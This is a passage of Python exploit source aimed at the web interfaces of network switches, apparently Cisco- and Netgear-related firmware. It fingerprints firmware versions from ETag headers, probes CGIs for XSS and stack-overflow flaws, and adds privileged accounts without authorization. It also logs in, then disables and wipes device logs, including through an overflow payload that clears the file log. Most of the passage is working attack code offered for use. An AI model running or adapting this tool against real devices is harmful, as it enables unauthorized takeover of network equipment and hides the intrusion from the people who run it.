self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\tlogging.status(\"Cleaned\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tlogging.status(\"Cleaned\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tlogging.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\ttry:\r\n\t\t\t# clean file log\r\n\t\t\ttime.sleep(1)\r\n\t\t\tlogging.status(\"Trying to clean filelog\")\r\n\t\t\tquery_args = self.target['exploit']['stack_cgi_log']['content']\r\n\t\t\tquery_args = query_args.replace(\"_JUMP_\", 
struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_fileClear'] + 0x58000000) ) # 0x58 will be overwritten\r\n\t\t\tquery_args = query_args.replace(\"_CMD_\",self.target['exploit']['stack_cgi_log']['log_fileClear_cmd'])\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tDEBUG(\"RECV\",response.read())\r\n\r\n\t\t\tif self.target['exploit']['stack_cgi_log']['log_fileClear_SIGSEGV']:\r\n\t\t\t\tlogging.failure(\"Clean FILE: Failed!\")\r\n\t\t\t\treturn False\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\tlogging.status(\"Cleaned\")\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\tif e.code == 502:\r\n\t\t\t\tlogging.status(\"Cleaned\")\r\n\t\t\t\tif self.Workaround:\r\n\t\t\t\t\tself.Workaround_logout()\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tlogging.failure(str(e))\r\n\t\t\t\treturn False\r\n\r\n\t\tif self.Workaround:\r\n\t\t\tself.Workaround_logout()\r\n\r\n\t\tlogging.success(\"Success\")\r\n\r\n\t\treturn True\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef verify_target(self,target,check_all):\r\n\t\tself.target = target\r\n\t\tself.check_all = check_all\r\n\r\n\t\tself.headers['Content-Type'] = \"multipart/form-data; boundary=-------\"\r\n\r\n\t\tself.Workaround = self.target['exploit']['heack_cgi_shell']['workaround']\r\n\r\n\t\tsorted_dict = OrderedDict(sorted(self.target['verify'].items(), key=lambda t: t[0])) # sorted by key\r\n\t\tfor check in sorted_dict:\r\n\r\n\t\t\tif self.Workaround:\r\n\t\t\t\tself.Workaround_logout()\r\n\t\t\t#\r\n\t\t\t# If we will try exploit, verify only that CGI\r\n\t\t\t#\r\n\t\t\tif not self.check_all:\r\n\t\t\t\tcheck = self.target['exploit']['heack_cgi_shell']['cgi']\r\n\r\n\t\t\tcgi = log.progress(\"{:.<30}\".format(check))\r\n\r\n\t\t\tif not len(self.target['verify'][check]['content']) == 0:\r\n\t\t\t\tif 
self.target['verify'][check]['Content-Type']:\r\n\t\t\t\t\tquery_args = \"Content-Type\\n\\n\" + self.target['verify'][check]['content']\r\n\t\t\t\telse:\r\n\t\t\t\t\tquery_args = self.target['verify'][check]['content']\r\n\r\n\t\t\tif not self.target['verify'][check]['safe']:\r\n\t\t\t\tcgi.success(\"Vulnerable ({})\".format(self.target['verify'][check]['content']))\r\n\t\t\t\tcontinue\r\n\r\n\t\t\tURI = self.target['verify'][check]['uri']\r\n\r\n\t\t\tif target.get('hash_uri'):\r\n\t\t\t\tURI += self.netgear_hash(URI)\r\n\r\n\t\t\ttry:\r\n\t\t\t\tif not len(self.target['verify'][check]['content']) == 0:\r\n\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\telse:\r\n\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\r\n\t\t\t\tif self.target['verify'][check]['response'] == 'json':\r\n\t\t\t\t\tresult = json.loads(response.read())\r\n\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\tif result['result'] == 1 and result['msg'] == \"Invalid file format.\":\r\n\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(result['msg']))\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\telif self.target['verify'][check]['response'] == 'xss':\r\n\t\t\t\t\tresponse = re.split('[\"?=&<>]',response.read())\t# bummer to split out '<>''\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tcount = 0\r\n\t\t\t\t\tfor content in range(0,len(response)):\r\n\t\t\t\t\t\tif response[content] == self.target['verify'][check]['content_check']:\r\n\t\t\t\t\t\t\tcgi.success(\"Vulnerable\")\r\n\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\treturn 
True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\t# Since we split out '<>' above, make sure to count in 'script' and '/script'\r\n\t\t\t\t\t\t\t#\r\n\t\t\t\t\t\t\tif response[content] == 'alert(XSS);' and response[content-1] == 'script' and response[content+1] == '/script':\r\n\t\t\t\t\t\t\t\tcount += 1\r\n\t\t\t\t\tif count:\r\n\t\t\t\t\t\tcgi.success(\"Vulnerable (XSS: {})\".format(count))\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\telif self.target['verify'][check]['response'] == 'html':\r\n\t\t\t\t\tresponse = re.split(\"['()<>\\n:,.&=]\",response.read())\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\tfor content in range(0,len(response)):\r\n\t\t\t\t\t\tif response[content] == self.target['verify'][check]['content_check'] or response[content] == 'Image CRC32 Error':\r\n\t\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(response[content]))\r\n\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t# We checking what will be returned from the request\r\n\t\t\t\t\t\t# 1. The error message is correct\r\n\t\t\t\t\t\t# 2. 
LEN of our 'content' matching reported LEN from target\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\telif response[content] == 'errkey':\r\n\t\t\t\t\t\t\tif response[content+1] == self.target['verify'][check]['content_check'] and int(response[content+3]) == int(len(self.target['verify'][check]['content'])):\r\n\t\t\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(response[content+1]))\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\r\n\t\t\t\telif self.target['verify'][check]['response'] == 'file':\r\n\t\t\t\t\tif self.target['verify'][check]['check_uri']:\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\ttime.sleep(1) # Some checks needs to have some time\r\n\t\t\t\t\t\t\tURI = self.target['verify'][check]['check_uri']\r\n\t\t\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\t\t\tif response == self.target['verify'][check]['content_check']:\r\n\t\t\t\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(response))\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tcgi.failure(\"NOT Vulnerable\")\r\n\t\t\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\t\t\texcept Exception as e:\r\n\t\t\t\t\t\t\tcgi.failure(str(e))\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcgi.failure(\"Not vulnerable\")\r\n\t\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\t\treturn False\r\n\r\n\t\t\t\tcgi.failure(\"Not vulnerable\")\r\n\t\t\t\tif not self.check_all:\r\n\t\t\t\t\treturn False\r\n\r\n\t\t\texcept Exception as e:\r\n\t\t\t\tDEBUG(\"RECV\",str(e))\r\n\t\t\t\tif e.code == 
502:\r\n\t\t\t\t\tcgi.success(\"Vulnerable ({})\".format(e))\r\n\t\t\t\t\tif not self.check_all:\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\tpass\r\n\t\t\t\telse:\r\n\t\t\t\t\tcgi.failure(str(e))\r\n\t\t\t\t\treturn False\r\n\r\n\t\treturn True\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef check_remote(self,etag):\r\n\t\tself.manualETag = etag\r\n\r\n\t\tremote = log.progress(\"Target\")\r\n\r\n\t\tif self.manualETag:\r\n\t\t\tif self.manualETag == 'help':\r\n\t\t\t\tprint \"\"\r\n\t\t\t\tremote.success(\"List of known targets\")\r\n\t\t\telif self.manualETag == 'info':\r\n\t\t\t\tprint \"\"\r\n\t\t\t\tremote.success(\"Brief information of known targets\")\r\n\r\n\t\t\ttarget = Vendor(self.manualETag).dict()\r\n\t\t\tif target:\r\n\t\t\t\tremote.success(\"{} ({} v{})\".format(target['vendor'],target['model'],target['version']))\r\n\t\t\t\treturn target\r\n\t\t\telse:\r\n\t\t\t\tremote.failure(\"Unknown ({})\".format(self.manualETag))\r\n\t\t\t\treturn False\r\n\r\n\t\tremote.status(\"Checking\")\r\n\t\tURI = '/'\r\n\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded\r\n\t\tresult = response.read().split()\r\n\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t#\r\n\t\t# Use HTTP ETag to identify remote vendor and FW version, to choose right code/gadgets\r\n\t\t#\r\n\t\tself.ETag = response.info().get('ETag').replace('\"','')\r\n\t\tDEBUG(\"RECV\",response.info())\r\n\r\n\t\ttarget = Vendor(self.ETag).dict()\r\n\t\tif not target:\r\n\t\t\tremote.failure(\"Unknown ({})\".format(self.ETag))\r\n\t\t\treturn False\r\n\r\n\t\tif target:\r\n\t\t\tremote.success(\"{} ({} v{})\".format(target['vendor'],target['model'],target['version']))\r\n\t\t\tif target['info_leak']:\r\n\t\t\t\tinfo_leak = log.progress(\"Model\")\r\n\t\t\t\tURI = target['info_leak_uri']\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = 
HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded\r\n\t\t\t\tresponse = response.read()\r\n\r\n\t\t\t\tif target['info_leak_JSON']:\r\n\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\t\t\t\t\ttmp = result.get('data')\r\n\t\t\t\t\tif tmp.get('description'):\r\n\t\t\t\t\t\tinfo_leak.success(result['data']['description'])\r\n\t\t\t\t\telif tmp.get('productName'):\r\n\t\t\t\t\t\tinfo_leak.success(result['data']['productName'])\r\n\t\t\t\t\telif tmp.get('title'):\r\n\t\t\t\t\t\tinfo_leak.success(result['data']['title'])\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tinfo_leak.failure(\"Failed\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tresponse = re.split('[()<>\\n:,.;=\" ]',response)\r\n\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\t\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\t\tif response[check] == 'modelName':\r\n\t\t\t\t\t\t\tinfo_leak.success(response[check+2])\r\n\t\t\t\t\t\t\treturn target\r\n\t\t\t\t\tinfo_leak.failure(\"Not found\")\r\n\t\t\t\t\tprint response\r\n\r\n\t\t\treturn target\r\n\r\n\t#\r\n\t# Access: Unauthorized\r\n\t#\r\n\tdef add_user(self,target):\r\n\t\tself.target = target\r\n\r\n\t\tadd = log.progress(\"Adding credentials\")\r\n\r\n\t\tif not self.target['exploit']['priv15_account']['vulnerable']:\r\n\t\t\tadd.failure(\"Not listed as vulnerable\")\r\n\t\t\tif self.target['exploit']['stack_cgi_add_account']['vulnerable']:\r\n\t\t\t\treturn self.stack_add_account(self.target)\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\r\n\t\tUSERNAME = self.credentials.split(':')[0]\r\n\r\n\t\tif USERNAME == 'admin' or USERNAME == 'cisco':\r\n\t\t\tlog.failure(\"[bad boy] Username '{}' shall not be changed!\".format(USERNAME))\r\n\t\t\treturn False\r\n\r\n\t\tif target['exploit']['priv15_account']['encryption'] == 'md5':\r\n\t\t\tPASSWORD = self.md5hash(self.credentials.split(':')[1], base64encode=True)\r\n\t\telif target['exploit']['priv15_account']['encryption'] == 'clear':\r\n\t\t\tPASSWORD = 
self.credentials.split(':')[1]\r\n\t\telif target['exploit']['priv15_account']['encryption'] == 'nopassword':\r\n\t\t\tPASSWORD = 'nopassword' # dummy\r\n\t\telse:\r\n\t\t\tlog.failure(\"No password type\")\r\n\t\t\treturn False\r\n\r\n\t\tquery_args = self.target['exploit']['priv15_account']['content']\r\n\t\tquery_args = query_args.replace('USERNAME',USERNAME)\r\n\t\tquery_args = query_args.replace('PASSWORD',PASSWORD)\r\n\r\n\t\tlog.info(\"Credentials: {}/{}\".format(USERNAME,PASSWORD))\r\n\r\n\t\ttry:\r\n\t\t\tadd.status(\"Trying...\")\r\n\t\t\tURI = target['exploit']['priv15_account']['add_uri']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read().split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'init(){fileLoadWait();' or response[check] == 'id=\"reason\">Merging' or response[check] == '(tmpStr.indexOf(\"FlashWriteDone\")':\r\n\t\t\t\t\tadd.success(\"Success\")\r\n\t\t\t\t\ttime.sleep(5) # Wait a bit so the account will be merged\r\n\t\t\t\t\treturn True\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tadd.failure(\"error {}\".format(e))\r\n\t\t\treturn False\r\n\r\n\t\tadd.failure(\"Failed\")\r\n\t\tprint response\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef del_user(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tif not self.target['exploit']['priv15_account']['vulnerable']:\r\n\t\t\tremove.failure(\"Not listed as vulnerable\")\r\n\t\t\tif self.target['exploit']['stack_cgi_del_account']['vulnerable']:\r\n\t\t\t\treturn self.stack_del_account(self.target)\r\n\t\t\telse:\r\n\t\t\t\treturn False\r\n\r\n\t\tUSERNAME = self.credentials.split(':')[0]\r\n\t\tremove = log.progress(\"Remove credentials for {}\".format(USERNAME))\r\n\r\n\t\tif USERNAME == 'admin' or USERNAME == 
'cisco':\r\n\t\t\tremove.failure(\"[bad boy] Username '{}' shall not be deleted!\".format(USERNAME))\r\n\t\t\treturn False\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\ttry:\r\n\t\t\tremove.status(\"Trying...\")\r\n\r\n\t\t\tURI = target['exploit']['priv15_account']['del_uri']\r\n\r\n\t\t\tif len(self.target['exploit']['priv15_account']['del_query']) >= 1:\r\n\t\t\t\tquery_args = self.target['exploit']['priv15_account']['del_query']\r\n\t\t\t\tquery_args = query_args.replace('USERNAME',USERNAME)\r\n\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\tresult = response\r\n\t\t\telse:\r\n\t\t\t\tURI = URI.replace('USERNAME',USERNAME)\r\n\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\tresult = response\r\n\t\t\t\tresponse = response.read()\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tif not self.target['exploit']['priv15_account']['json']:\r\n\t\t\t\tif result.code == 200 and len(response) == 0:\r\n\t\t\t\t\tremove.success(\"Success\")\r\n\t\t\t\t\treturn True\r\n\r\n\t\t\t\tresponse = response.split(\"'\")\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == ': The user is not exist!!<br>' or response[check] == 'Error String':\r\n\t\t\t\t\t\tremove.failure(\"User do not exist\")\r\n\t\t\t\t\t\tself.logout(self.target)\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\tremove.failure(\"Failed\")\r\n\t\t\t\tself.logout(self.target)\r\n\t\t\t\treturn False\r\n\t\t\telse:\r\n\t\t\t\tresult = json.loads(response.read())\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 
'save_success':\r\n\t\t\t\t\tremove.success(\"Success\")\r\n\t\t\t\t\treturn True\r\n\r\n\t\texcept Exception as e:\r\n\t\t\tlog.info(\"error {}\".format(e))\r\n\t\t\treturn False\r\n\r\n\t\tremove.failure(\"Failed\")\r\n\t\tprint result\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef logout(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tlogout = log.progress(\"Logging out\")\r\n\r\n\t\tif not self.target['login']['vulnerable']:\r\n\t\t\tlogout.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tlogout.status(\"Trying...\")\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\tURI = self.target['login']['logout_uri']\r\n\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded\r\n\t\tresponse = response.read()\r\n\t\tif not self.target['login']['json']:\r\n\t\t\tresponse = response.split()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\tif response[check] == 'function goback(){' or response[check] == 'onload=\"goback();\">': \r\n\t\t\t\t\tlogout.success(\"Success\")\r\n\t\t\t\t\treturn True\r\n\r\n\t\t\tlogout.failure(\"Failed\")\r\n\t\t\treturn False\r\n\r\n\t\telse:\r\n\t\t\tresult = json.loads(response)\r\n\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\tif result['status'] == 'ok' and result['msgType'] == 'success' or result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\tlogout.success(\"Success\")\r\n\t\t\t\treturn True\r\n\t\t\telse:\r\n\t\t\t\tlogout.failure(\"Failed\")\r\n\t\t\t\tprint result\r\n\t\t\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef login(self,target):\r\n\t\tself.target = target\r\n\r\n\t\tlogin = log.progress(\"Login\")\r\n\r\n\t\tif not self.target['login']['vulnerable']:\r\n\t\t\tlogin.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn 
False\r\n\r\n\t\t#\r\n\t\t# login\r\n\t\t#\r\n\t\ttry:\r\n\t\t\tUSERNAME = self.credentials.split(':')[0]\r\n\r\n\t\t\tif self.target['login']['encryption'] == 'rsa':\r\n\t\t\t\tPASSWORD = self.RSA_Password(self.credentials.split(':')[1])\r\n\t\t\telif self.target['login']['encryption'] == 'caesar':\r\n\t\t\t\tPASSWORD = self.caesar_encode(self.credentials.split(':')[1])\r\n\t\t\telif self.target['login']['encryption'] == 'encode':\r\n\t\t\t\tPASSWORD = self.obfuscation_encode(self.credentials.split(':')[1])\r\n\t\t\telif self.target['login']['encryption'] == 'clear':\r\n\t\t\t\tPASSWORD = self.credentials.split(':')[1]\r\n\t\t\telse:\r\n\t\t\t\tlogin.failure(\"No login password matching\")\r\n\t\t\t\treturn False\r\n\r\n\t\t\tquery_args = self.target['login']['query']\r\n\t\t\tquery_args = query_args.replace('USERNAME',USERNAME)\r\n\t\t\tquery_args = query_args.replace('PASSWORD',PASSWORD)\r\n\r\n\t\t\tURI = self.target['login']['login_uri']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tif not self.target['login']['json']:\r\n\t\t\t\tresponse = response.split()\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == 'top.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=1\")' or response[check] == 'href=\"/cgi-bin/dispatcher.cgi?cmd=5890':\r\n\t\t\t\t\t\tlogin.success(\"Success\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telif response[check] == 'window.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=3\");':\r\n\t\t\t\t\t\tlogin.success(\"Already logged in\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telif response[check] == 'top.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=5\")':\r\n\t\t\t\t\t\tlogin.failure(\"Failed\")\r\n\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif len(response) == check + 1:\r\n\t\t\t\t\t\tlogin.failure(\"Not 
supported device\")\r\n\t\t\t\t\t\tprint response\r\n\t\t\t\t\t\treturn False\r\n\t\t\telse:\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success' or result['status'] == 'ok' and result['msgType'] == 'success':\r\n\t\t\t\t\tlogin.status(\"Verifying\")\r\n\t\t\t\t\tURI = self.target['login']['status_uri']\r\n\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\tif result['data']['status'] == 'ok':\r\n\t\t\t\t\t\tlogin.success(\"Success\")\r\n\t\t\t\t\t\treturn True\r\n\t\t\t\t\telif result['data']['status'] == 'authing':\r\n\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\t# try one more time\r\n\t\t\t\t\t\tURI = self.target['login']['status_uri']\r\n\t\t\t\t\t\tlogin.status(\"One more time...\")\r\n\t\t\t\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\t\tresult = json.loads(response)\r\n\t\t\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\t\t\tif result['data']['status'] == 'ok':\r\n\t\t\t\t\t\t\tlogin.success(\"Success\")\r\n\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tlogin.failure(\"Failed (Authing)\")\r\n\t\t\t\t\t\t\treturn False\r\n\t\t\t\t\telif result['data']['status'] == 'fail':\r\n\t\t\t\t\t\tlogin.failure(\"Failed {}\".format(result['data']['failReason']))\r\n\t\t\t\t\t\treturn False\r\n\r\n\t\texcept Exception as e:\r\n\r\n\t\t\tlogin.failure(\"error {}\".format(e))\r\n\r\n\t\treturn False\r\n\r\n\t#\r\n\t# Access: Authenticated\r\n\t#\r\n\tdef disable_clean_log(self, target):\r\n\t\tself.target = target\r\n\r\n\t\tclear_log = 
log.progress(\"Logging disable & clean\")\r\n\r\n\t\tif not self.target['log']['vulnerable']:\r\n\t\t\tclear_log.failure(\"Not listed as vulnerable\")\r\n\t\t\treturn False\r\n\r\n\t\tif self.check_XSID(self.target):\r\n\t\t\tself.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)\r\n\r\n\t\ttry:\r\n\t\t\tclear_log.status(\"Trying to disable\")\r\n\r\n\t\t\tURI = self.target['log']['disable_uri']\r\n\t\t\tquery_args = self.target['log']['disable_query']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\tURI = self.target['log']['status']\r\n\t\t\tDEBUG(\"SEND\",URI)\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tif not self.target['log']['json']:\r\n\t\t\t\tresponse = re.split(\"[<>\\n]\",response)\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == 'window.location.replace(\"/cgi-bin/dispatcher.cgi?cmd=5120\");':\r\n\t\t\t\t\t\tclear_log.status(\"Disabled\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\telse: # json\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['data']['logState'] == False:\r\n\t\t\t\t\tclear_log.status(\"Disabled\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tclear_log.failure(\"Logging still enabled\")\r\n\t\t\t\t\treturn False\r\n\r\n\t\t\tclear_log.status(\"Trying to clean\")\r\n\r\n\t\t\tURI = self.target['log']['clean_logfile_uri']\r\n\t\t\tquery_args = self.target['log']['clean_logfile_query']\r\n\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\tresponse = response.read()\r\n\t\t\tif 
not self.target['log']['json']:\r\n\t\t\t\tresponse = re.split(\"[<>'\\n]\",response)\r\n\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':\r\n\t\t\t\t\t\tclear_log.status(\"Disabled\")\r\n\t\t\t\t\t\tURI = self.target['log']['clean_logmem_uri']\r\n\t\t\t\t\t\tquery_args = self.target['log']['clean_logmem_query']\r\n\t\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\t\tresponse = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded\r\n\t\t\t\t\t\tresponse = response.read()\r\n\t\t\t\t\t\tresponse = re.split(\"[<>'\\n]\",response)\r\n\t\t\t\t\t\tDEBUG(\"RECV\",response)\r\n\r\n\t\t\t\t\t\tfor check in range(0,len(response)):\r\n\t\t\t\t\t\t\tif response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':\r\n\t\t\t\t\t\t\t\tclear_log.success(\"Success\")\r\n\t\t\t\t\t\t\t\treturn True\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tclear_log.failure(\"Failed\")\r\n\t\t\t\treturn False\r\n\t\t\telse: # json\r\n\t\t\t\tresult = json.loads(response)\r\n\t\t\t\tDEBUG(\"RECV\",result)\r\n\r\n\t\t\t\tif result['status'] == 'ok' and result['msgType'] == 'save_success':\r\n\t\t\t\t\tURI = self.target['log']['clean_logmem_uri']\r\n\t\t\t\t\tquery_args = self.target['log']['clean_logmem_query']\r\n\t\t\t\t\tDEBUG(\"SEND\",(URI, query_args))\r\n\r\n\t\t\t\t\tresponse = 